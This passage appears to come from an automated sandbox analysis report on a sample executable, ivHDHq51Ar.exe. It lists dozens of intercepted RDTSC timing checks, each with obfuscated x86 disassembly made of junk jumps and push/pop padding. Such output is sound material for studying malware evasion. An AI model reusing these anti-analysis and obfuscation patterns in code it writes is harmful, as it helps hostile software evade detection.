0x00000060 add ecx, 5B6F3F58h 0x00000066 jmp 00007FE1010EA78Bh 0x0000006b popfd 0x0000006c popad 0x0000006d mov ebx, dword ptr [eax+10h] 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FE1010EA790h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0196 second address: 6EE01A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE01A5 second address: 6EE0224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FE1010EA78Eh 0x0000000f push eax 0x00000010 jmp 00007FE1010EA78Bh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 mov ax, 63DBh 0x0000001b pushfd 0x0000001c jmp 00007FE1010EA790h 0x00000021 sub eax, 4BD765A8h 0x00000027 jmp 00007FE1010EA78Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov esi, dword ptr [770206ECh] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FE1010EA795h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0224 second address: 6EE0234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE100E1706Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0234 second address: 6EE0273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FE1010EA797h 0x0000000f jne 00007FE1010EB5D2h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a call 00007FE1010EA791h 0x0000001f pop eax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0273 second address: 6EE0291 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, 5801CE10h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0291 second address: 6EE02BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE1010EA78Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE02BA second address: 6EE034F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE100E17071h 0x00000009 adc si, CDF6h 0x0000000e jmp 00007FE100E17071h 0x00000013 popfd 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c mov dh, 64h 0x0000001e pushfd 0x0000001f jmp 00007FE100E17072h 0x00000024 jmp 00007FE100E17075h 0x00000029 popfd 0x0000002a popad 0x0000002b call dword ptr [76FF0B60h] 0x00000031 mov eax, 7571E5E0h 0x00000036 ret 0x00000037 jmp 00007FE100E1706Eh 0x0000003c push 00000044h 0x0000003e jmp 00007FE100E17070h 0x00000043 pop edi 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FE100E1706Ah 0x0000004d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE034F second address: 6EE0355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0355 second address: 6EE0366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE100E1706Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0366 second address: 6EE036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE036A second address: 6EE038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE100E17074h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE038B second address: 6EE0391 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0391 second address: 6EE03A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE100E1706Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE03A2 second address: 6EE03A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE03A6 second address: 6EE03CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b jmp 00007FE100E1706Dh 0x00000010 push dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE100E1706Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE03CF second address: 6EE03D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE03D5 second address: 6EE03D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE03D9 second address: 6EE0444 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 jmp 00007FE1010EA796h 0x00000016 push dword ptr [eax+18h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FE1010EA798h 0x00000022 jmp 00007FE1010EA795h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0541 second address: 6EE0547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0547 second address: 6EE055A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE055A second address: 6EE055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE055E second address: 6EE0564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0564 second address: 6EE05C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 65ADh 0x00000007 movzx esi, dx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi], edi 0x0000000f pushad 0x00000010 mov si, 141Dh 0x00000014 popad 0x00000015 mov dword ptr [esi+04h], eax 0x00000018 jmp 00007FE100E17078h 0x0000001d mov dword ptr [esi+08h], eax 0x00000020 jmp 00007FE100E17070h 0x00000025 mov dword ptr [esi+0Ch], eax 0x00000028 jmp 00007FE100E17070h 0x0000002d mov eax, dword ptr [ebx+4Ch] 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov cx, di 0x00000036 mov si, di 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE05C7 second address: 6EE05DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1010EA791h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE05DC second address: 6EE05E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE05E0 second address: 6EE0646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b jmp 00007FE1010EA78Dh 0x00000010 mov eax, dword ptr [ebx+50h] 0x00000013 jmp 00007FE1010EA78Eh 0x00000018 mov dword ptr [esi+14h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 pushfd 0x00000021 jmp 00007FE1010EA793h 0x00000026 sbb ecx, 709DBC0Eh 0x0000002c jmp 00007FE1010EA799h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0646 second address: 6EE069E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE100E17077h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FE100E17079h 0x0000000f adc cx, 41A6h 0x00000014 jmp 00007FE100E17071h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov eax, dword ptr [ebx+54h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE069E second address: 6EE06A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE06A4 second address: 6EE06DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 mov ecx, 1B576763h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+18h], eax 0x00000010 pushad 0x00000011 mov bx, ax 0x00000014 mov dx, si 0x00000017 popad 0x00000018 mov eax, dword ptr [ebx+58h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE100E17079h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE06DA second address: 6EE071C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA791h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c jmp 00007FE1010EA78Eh 0x00000011 mov eax, dword ptr [ebx+5Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE1010EA797h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE071C second address: 6EE0722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0722 second address: 6EE0726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0726 second address: 6EE075A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d mov ax, dx 0x00000010 movsx ebx, ax 0x00000013 popad 0x00000014 mov cx, 8D47h 0x00000018 popad 0x00000019 mov eax, dword ptr [ebx+60h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE100E17074h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE075A second address: 6EE0769 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA78Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0769 second address: 6EE07B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c jmp 00007FE100E1706Eh 0x00000011 mov eax, dword ptr [ebx+64h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE100E17077h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE07B3 second address: 6EE07D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE07D9 second address: 6EE07DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE07DF second address: 6EE07F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1010EA791h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE07F4 second address: 6EE080A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+68h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movzx eax, dx 0x00000011 mov bx, 9E16h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE080A second address: 6EE0821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1010EA793h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0821 second address: 6EE0825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0825 second address: 6EE0861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b jmp 00007FE1010EA795h 0x00000010 mov ax, word ptr [ebx+6Ch] 0x00000014 jmp 00007FE1010EA78Eh 0x00000019 mov word ptr [esi+30h], ax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0861 second address: 6EE087E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE087E second address: 6EE095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f jmp 00007FE1010EA794h 0x00000014 mov word ptr [esi+32h], ax 0x00000018 jmp 00007FE1010EA790h 0x0000001d mov eax, dword ptr [ebx+0000008Ch] 0x00000023 jmp 00007FE1010EA790h 0x00000028 mov dword ptr [esi+34h], eax 0x0000002b jmp 00007FE1010EA790h 0x00000030 mov eax, dword ptr [ebx+18h] 0x00000033 pushad 0x00000034 mov ecx, 69EC083Dh 0x00000039 movzx esi, bx 0x0000003c popad 0x0000003d mov dword ptr [esi+38h], eax 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FE1010EA78Bh 0x00000047 xor eax, 6C997A2Eh 0x0000004d jmp 00007FE1010EA799h 0x00000052 popfd 0x00000053 pushfd 0x00000054 jmp 00007FE1010EA790h 0x00000059 sub ch, FFFFFFA8h 0x0000005c jmp 00007FE1010EA78Bh 0x00000061 popfd 0x00000062 popad 0x00000063 mov eax, dword ptr [ebx+1Ch] 0x00000066 jmp 00007FE1010EA796h 0x0000006b mov dword ptr [esi+3Ch], eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE095E second address: 6EE0962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0962 second address: 6EE0968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0968 second address: 6EE096E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE096E second address: 6EE0972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0972 second address: 6EE0976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0976 second address: 6EE0987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0987 second address: 6EE098B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE098B second address: 6EE0991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0991 second address: 6EE0997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0997 second address: 6EE0A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+40h], eax 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f mov ecx, edi 0x00000011 popad 0x00000012 lea eax, dword ptr [ebx+00000080h] 0x00000018 pushad 0x00000019 mov cl, bl 0x0000001b pushfd 0x0000001c jmp 00007FE1010EA790h 0x00000021 and cx, 69F8h 0x00000026 jmp 00007FE1010EA78Bh 0x0000002b popfd 0x0000002c popad 0x0000002d push 00000001h 0x0000002f pushad 0x00000030 jmp 00007FE1010EA794h 0x00000035 popad 0x00000036 push ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FE1010EA793h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0A03 second address: 6EE0A54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE100E1706Fh 0x00000009 jmp 00007FE100E17073h 0x0000000e popfd 0x0000000f call 00007FE100E17078h 0x00000014 pop eax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ecx, 0A93B119h 0x00000023 push ecx 0x00000024 pop edx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0A54 second address: 6EE0A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0A5A second address: 6EE0A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0A5E second address: 6EE0AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FE1010EA793h 0x00000017 jmp 00007FE1010EA793h 0x0000001c popfd 0x0000001d mov ax, C77Fh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0AA4 second address: 6EE0AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE100E17070h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0B91 second address: 6EE0BAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 call 00007FE1010EA78Ch 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0BAF second address: 6EE0BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0BB5 second address: 6EE0BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0BB9 second address: 6EE0C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+78h] 0x0000000b pushad 0x0000000c call 00007FE100E17074h 0x00000011 mov si, 6711h 0x00000015 pop esi 0x00000016 mov cx, di 0x00000019 popad 0x0000001a push 00000001h 0x0000001c jmp 00007FE100E17079h 0x00000021 nop 0x00000022 pushad 0x00000023 call 00007FE100E1706Ch 0x00000028 mov si, 0961h 0x0000002c pop ecx 0x0000002d push ebx 0x0000002e mov eax, 5D618399h 0x00000033 pop eax 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov cx, bx 0x0000003c pushfd 0x0000003d jmp 00007FE100E1706Dh 0x00000042 or ecx, 63CFF5E6h 0x00000048 jmp 00007FE100E17071h 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0C46 second address: 6EE0C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0C4C second address: 6EE0C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0C50 second address: 6EE0C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0C54 second address: 6EE0C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a movsx ebx, si 0x0000000d pushfd 0x0000000e jmp 00007FE100E1706Eh 0x00000013 and cx, F4B8h 0x00000018 jmp 00007FE100E1706Bh 0x0000001d popfd 0x0000001e popad 0x0000001f lea eax, dword ptr [ebp-08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FE100E17075h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0C9C second address: 6EE0CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1010EA78Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0CAC second address: 6EE0CC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a call 00007FE100E1706Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0CC2 second address: 6EE0CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov bx, 5524h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE1010EA796h 0x00000014 rdtsc
